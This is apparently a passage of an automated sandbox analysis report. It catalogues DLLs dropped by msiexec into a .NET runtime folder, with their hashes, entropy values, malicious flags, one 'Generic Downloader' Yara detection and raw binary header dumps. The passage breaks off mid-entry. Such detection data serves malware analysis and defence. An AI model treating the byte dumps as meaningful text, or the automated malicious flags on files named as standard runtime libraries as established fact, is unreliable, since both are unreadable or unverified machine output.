                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8............"!..0..............+... ........@.. ..............................:.....`.................................L+..O....@...................)...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ......................................g8xv...a..M..!....(G.1a........../}\.fl".SJ.tz...U.a.........=.e\..|.....^f.....afq.y.......c<Ff.=...W..?.<G6....OP.]..mBSJB............v4.0.30319......`.......#~..l.......#Strings............#GUID...,.......#Blob......................3................................................L...............................8.....L...p.L.....L.....L.....L.....L.....L...l.L.....L.............................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.651913199525005
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MW0aeWJ4nTLVGQYA6VFHRN7NN/7R9zCMZ:3J4nPlFCljF9zL
                                                                                                                                                                                                                                                                                                                                  MD5:0059E13D67A0A703782F6761903F9993
                                                                                                                                                                                                                                                                                                                                  SHA1:F278429223A4993D3757465A5CDEB11679708C03
                                                                                                                                                                                                                                                                                                                                  SHA-256:186782FBF3EEE0E17A95D06769548771B62252BDC412BE8F83A582D091A8DBD6
                                                                                                                                                                                                                                                                                                                                  SHA-512:CDDBBBC503FA1C2D98C267CDC1A31ED052A8E5AE870924ECDE9408D044F571C9F701FE85E2DB7AEF5005B6B262F8BCBE08DF00D2E35BCAC25361987E362E6A3C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...y{............" .........................................................P............`...@......@............... ......................................0...H........)...@......P...T...............................................................H............text............................... ..`.data...?....0......................@....reloc.......@......................@..B............................................0...........................\.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...N.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...X.m.l...X.P.a.t.h...X.D.o.c.u.m.e.n.t.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...^.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.724803734854889
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:J/lRiA8DrHDWBVvWrjcYA6VFHRN7cVXC4deR9zVjxqmt:PP804cFClcVXC4dC9zVjYK
                                                                                                                                                                                                                                                                                                                                  MD5:D8BD70EB45B4B115C2ED458D8A5E756A
                                                                                                                                                                                                                                                                                                                                  SHA1:1FE7563C6A18BE3D0E59FC0CDFF54495C5A15F42
                                                                                                                                                                                                                                                                                                                                  SHA-256:4FA30F4343142ABC37495DC2DF892A2B357C00C9FE5389B5E3D3566A888F75E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:68233A9CD8C4524C57038569E6D6770E03B8A6DF95F31463753E4BA4834D3CE9FE87F458B27B282E4425CB453AB59287D03E0B5824075B5B477E3EE184095F2C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M............."!..0..............*... ........@.. ...............................h....`.................................|*..O....@..h................)...`.......)..8............................................ ............... ..H............text........ ...................... ..`.rsrc...h....@......................@..@.reloc.......`......................@..B.................*......H........ ......................P ......................................R].!.k..R....I..`?.sA%!....`.......d...!.]....R....^..8./.O..b...3....%_bf.P]..=.]I..3...._.p7q....C+V...#..o<....w7...+.n...?BSJB............v4.0.30319......`.......#~......\...#Strings....X.......#GUID...h.......#Blob......................3......................................'.........C...............................d...%.{...g.{.....{...|.{.....{.....{.....{...c.{.....{.............................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlDocument.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.785986414151434
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MVZNGfjiWeEsWRYA6VFHRN7EvQFcTR9z6TlLOH:6NGpbFClEvQeV9zalLOH
                                                                                                                                                                                                                                                                                                                                  MD5:E4C4592017D5132F245A622B8F40970E
                                                                                                                                                                                                                                                                                                                                  SHA1:EDDF6A290E9250B5B6668E00101F6F48D23A4D4A
                                                                                                                                                                                                                                                                                                                                  SHA-256:08C59884C4662F992985FBC992F196961BA9D8D3DC2CB3BF3E6E3602426B2F54
                                                                                                                                                                                                                                                                                                                                  SHA-512:46A12FAE6D250D3D8C75016B41FC6CBCE03512419D989B0F9C3206FDFA2CE4E68FA9A0B437ABDB7B17EAAA68841139EF0AFC50696B83D0FD49917B8B99F83AC9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%............."!..0..............+... ........@.. ....................................`.................................|+..O....@...................)...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ......................................e.X.]w...1......(.....Ra$.|.w.xHj)......;nN+.E..(..Q.'U2.a.Y........l..6...!.w(.....J..M.>....3.....\...j.#...?....1.(Z(;..tT.BSJB............v4.0.30319......`.......#~..\.......#Strings....H.......#GUID...X.......#Blob......................3......................................#.........P./...../.........O.............\...2.....g...................................p............./.......................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.62112689223517
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:JmiLgTJNTDxhkcWplvW5MWxNzx95jmHnhWgN7agW5wIAgfcMbnoQNpX01k9z3Abg:Yi8rdhbWplvW5TX6HRN7xI/7R9zCng
                                                                                                                                                                                                                                                                                                                                  MD5:AC8C00A6747DE5226C137D208C4F182B
                                                                                                                                                                                                                                                                                                                                  SHA1:215E2563CA1AE5FDD1DFABCDA2D4281451C37A03
                                                                                                                                                                                                                                                                                                                                  SHA-256:55F9EDDE671BB0B598826186B23DC864753770B65F7EBE53D3AC3D86512A1B3A
                                                                                                                                                                                                                                                                                                                                  SHA-512:31149C242D6E3CB429E9E3F84C4DE13782C82788D189217ABCFE9A058D7CEE871B8B682D49531D912F6F58DE325136BBA1C073FF1D3F5E14E56ADBFEA57E761C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#.y..........."!..0..............3... ........@.. ...............................E....`..................................2..W....@.................. )...`...... 2..8............................................ ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................3......H........ ..P...................P ........................................{...m`.."n....v.......X....#h.V.c....^.U.d..n..5..-]...d......T......2|4A....G.6.....\;./.3.-.}.....,....06ph.QG..o..BSJB............v4.0.30319......`.......#~..(...p...#Strings............#GUID...........#Blob......................3................................J.................................+.....F...........N.....H.........................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.196087974091141
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:qV/Mc95qohA8bhUVGdOQgWKwjsWlYA6VFHRN721DX+iR9zZjES:qV0chOkrFCl+DuO9z9ES
                                                                                                                                                                                                                                                                                                                                  MD5:FD9D85F47840B07B63FAC3C7B1A67ACF
                                                                                                                                                                                                                                                                                                                                  SHA1:09B9728960F9A81B3D67B3F1D9E6E19C0247014E
                                                                                                                                                                                                                                                                                                                                  SHA-256:D563E81C9FEEEF2C1E30A1DB45C95A3CE2A1BC18693CE30289E466D6E1ABC9D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:FA1F20E27EA6A51EEDE46C418792790925E16CC752155B72412312A4A14DEDFCCF1F032C42A7A17B298B8DA5B6FE98DCCC43C062C41C4786EBEC01340FDF12D8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............L... ...`....... ....................................`..................................K..O....`..8............8...(...........J..T............................................ ............... ..H............text....,... ...................... ..`.rsrc...8....`.......0..............@..@.reloc...............6..............@..B.................K......H.......P ...*..................lJ......................................BSJB............v4.0.30319......l...@...#~..........#Strings....L'......#US.P'......#GUID...`'......#Blob............T.........3..........................................P............... .................k.....H...........S.................G...................................+.....m.S...0...................x.....x.....x...).x...1.x...9.x...A.x...I.x...Q.x...Y.x...a.x...i.x...q.x...y.x.....x. ...x.....x...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):50960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.747090092923577
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:eQuoy1c6A2ZX8TRNH5JVbOd502zq1TntVBFFClwl9zx:eQuoO3ZX8Q5jzC3BTiw3zx
                                                                                                                                                                                                                                                                                                                                  MD5:C4B42F4015DB97630DAC03F6B12EA124
                                                                                                                                                                                                                                                                                                                                  SHA1:C1ECEAE6CB9C4F6E39F4F582052E3824DB2A5323
                                                                                                                                                                                                                                                                                                                                  SHA-256:A0CAE7A8FF1A44A04215B2FEE19D73B6D9351A7DCEAF17E25D8DC72E5D0A5D60
                                                                                                                                                                                                                                                                                                                                  SHA-512:C75AC92E9F72D016BEDC60AB2FD49C3E21C4C8AE44665FA80613AEEF1A669191F1182EBBEAEF9EDA76A77980930BAE4E5DF238D9CE47689AF781092C298D6CD1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../&K..........." ..0.................. ........... ....................................`.....................................O........................).............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......P ......................`.......................................BSJB............v4.0.30319......l...$;..#~...;...R..#Strings....4.......#US.8.......#GUID...H.......#Blob............T.........3................................/......................=.....=....J=...=......V...}.....h.. ..... ..... ..J.. ..... ..... ..... ..1.. ..j.. .., AF..a.AF.....R..e..=.................;.....;.....;..)..;..1..;..9..;..A..;..I..;..Q..;..Y..;..a..;..i..;..q..;..y..;.....; ....;.....;..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\WindowsBase.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.687937690598966
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:vpmduasEWQ+E9ZRWVEcWWUYA6VFHRN7rpR9z+ptz/nk:v0dJnP8UFClrD9zWZ/k
                                                                                                                                                                                                                                                                                                                                  MD5:843DB412D5B8F71F10EDD73561B4804B
                                                                                                                                                                                                                                                                                                                                  SHA1:C33B33AD7A29C9E981A049B1DA3E6A793F5CE034
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF02BFB85E43E968B8095065809715D40039841AA1CAAACFEACB9A303C35F93A
                                                                                                                                                                                                                                                                                                                                  SHA-512:AADD18D36BAF1D40309B2B3D128D770AEC298A7F0498C17D5BEFB85ACD32650547D2FB6CA58134221A335DFADBFE1C4B925C14A65A2D971E8F58442EE59013ED
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0............../... ...@....... ..............................c.....`.....................................O....@..8................)...`.......-..T............................................ ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`......................@..B........................H.......P .. ...................p-......................................BSJB............v4.0.30319......l.......#~..$.......#Strings............#US.........#GUID.......D...#Blob............T.........3..........................................f.........3.................'.....0.......v.....................l...........I.....f.....S.............i.....i................. ...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.459775574843526
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:SOQWvhW/WYnO/VWQ4SWc0NsxZAqnajT9CJIC:SjWvhWvUsNs/Al39AL
                                                                                                                                                                                                                                                                                                                                  MD5:681C84FB102B5761477D8DA2D68CD834
                                                                                                                                                                                                                                                                                                                                  SHA1:FD96CF075A956FBC2B74E1ECC3E7958163B58832
                                                                                                                                                                                                                                                                                                                                  SHA-256:F0F7CB2A9FFCCB43400DB88D6BF99F2FCC3161DE1AC96C48501D4D522C48C2CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:C41A62F8D10290215B8A7F0DDCC27A1CF12A7453C2DAABEF75BD2CE87C4FFC87D74EDC8CAA1771BEDA0BFA26249CFE3C94D4AF50B22A5DECB6D282BD8A2C4BDD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...B4............" .........0...............................................@............`A........................................p...,............0...............0...!..............p............................................................................rdata..t...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-2-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.499619700582879
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:L6WvhWFWYnO/VWQ4SWssAtkqnaj6M07i5CK:+WvhW1UslWMui57
                                                                                                                                                                                                                                                                                                                                  MD5:039D612693E56CCF32AE81C99443EA77
                                                                                                                                                                                                                                                                                                                                  SHA1:0487AA5E7D283A8840F3005D1E24E8C9ED140974
                                                                                                                                                                                                                                                                                                                                  SHA-256:4E978EE035B72032D0B7693E09EED6E112DCED6965780BC3E6B8E024EA2366AB
                                                                                                                                                                                                                                                                                                                                  SHA-512:FFA56C73E977FFCEF7890AB6C3EC52E9827AF28B0552F11C48BB7CA16D37C2B7069FB7E03CEFB89F8679E3755BCC8C47344D0D9B91416C6D92CA7DB28C20240A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....=.........." .........0...............................................@...........`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.308560743366262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:1WvhW/WYnO/VWQ4yWxK2fvXqnajeCqN+6:1WvhWvU8XlX0
                                                                                                                                                                                                                                                                                                                                  MD5:2A8065DC6E6E60FB90B4B3F9E6BA7288
                                                                                                                                                                                                                                                                                                                                  SHA1:400A1F44CD4354DEA0117E79EC04B006D6141B36
                                                                                                                                                                                                                                                                                                                                  SHA-256:55E5F10D0DD9C85FF1C6DC7798E46B3A4422FB7EBC583BB00D06A7DF2494397B
                                                                                                                                                                                                                                                                                                                                  SHA-512:787E033E35AA357263639D97FDFE8A2EBC9F17865579BE13C14C0A4C2ED99432ED8EA79C5046D1B4B783BF5FCF7B713EFDD70FCA8445A7AFCB91CFDDC7F9D442
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...FBe..........." .........0...............................................@.......,....`A........................................p................0...............0...!..............p............................................................................rdata..X...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314779945585029
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:JWvhWiWYnO/VWQ4mWAyTIl1PXEKup3JdqnajKsztG2:JWvhWYUQI/PX7aJdlGsztG2
                                                                                                                                                                                                                                                                                                                                  MD5:720DB2235C4193151FF8987F8A729135
                                                                                                                                                                                                                                                                                                                                  SHA1:038648798892203B506AB4664BAECA25F78BC43C
                                                                                                                                                                                                                                                                                                                                  SHA-256:092B72832C47F9C4EDCDE61F1A111C20EB73452984E0A6109482DE74EB03C34D
                                                                                                                                                                                                                                                                                                                                  SHA-512:CAAC89DC4FE10E7752B6F248623B34A47A77A750E62F0A558C760A8AD672D980AFC966A9E5696BA5C916E722FD221D305C4D2C49D5DDA0E4A768855886D4F3CA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...@4............" .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.363620943088422
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:9m7xeiImxD3exWvhW5WWYnO/VWQ4mWACJXEKup3JdqnajKsztJ30:9m7xeiIFxWvhWuUkX7aJdlGsztd0
                                                                                                                                                                                                                                                                                                                                  MD5:ECDD006AAE56427C3555740F1ABFA8D6
                                                                                                                                                                                                                                                                                                                                  SHA1:7DFAB7AD873544F627B42C7C4981A8700A250BD4
                                                                                                                                                                                                                                                                                                                                  SHA-256:13BC8B3F90DA149030897B8F9F08D71E5D1561E3AE604472A82F58DAB2B103F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:A9B37E36F844796A0FE53A60684BE51AB4013750BB0B8460C261D25FA5F3DE6CE3380044DDC71116825D130A724DF4BA351C2CFFCBF497EF1B6C443545E83F1C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......v.........." .........0...............................................@.......p....`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-fibers-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.2939305898439235
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:8gWvhWliWYnO/VWQ4mWCkJZH2vArqnajKsbTYjtZ:NWvhWlYUDuH24rlGsbTY5Z
                                                                                                                                                                                                                                                                                                                                  MD5:EB065ED1B5CABDBB90E2403B8564778F
                                                                                                                                                                                                                                                                                                                                  SHA1:5B511215EE0E347734FB727FAD6A0A959FF81BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB2D740333AFAEA2A73A163F95FA102D018CCD68DEF28B6815A2BE0696AB57DB
                                                                                                                                                                                                                                                                                                                                  SHA-512:E5FF38F28253FB31BF583131E23EF58AF60020AD1FB329986C8789FE351F4B73CB06109FBC4220678D93191B04DB353466F728534AA1FEBEDF150C491B8E7C65
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....cc.........." .........0...............................................@.......o....`A........................................p................0...............0...!..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25048
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.628757275210407
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:1mtaNYPvVX8rFTsvWvhWmWYnO/VWQ4yW9AfvXqnajeCqKW:8PvVXhWvhWMU7XlX7W
                                                                                                                                                                                                                                                                                                                                  MD5:36277B52C64CC66216751AAD135528F9
                                                                                                                                                                                                                                                                                                                                  SHA1:F2A6740BA149A83E4E58E1E331429FA3EB44FBA0
                                                                                                                                                                                                                                                                                                                                  SHA-256:F353B6C2DF7AADB457263A02BCE59C44BBAB55F98AE6509674CFBC3751F761B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:BE729194A0A3C4D70A6FFA8DE5C7F8BB3DDA1F54772F9AEFF4B9AA1D6756720D149613C5DCB911286B6C0181A264A4A2A8A4EB848C09AC30BA60B6FD10DD64C9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...!..e.........." .........@...............................................P............`A........................................p................@...............@...!..............p............................................................................rdata..L........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-2-0.dll

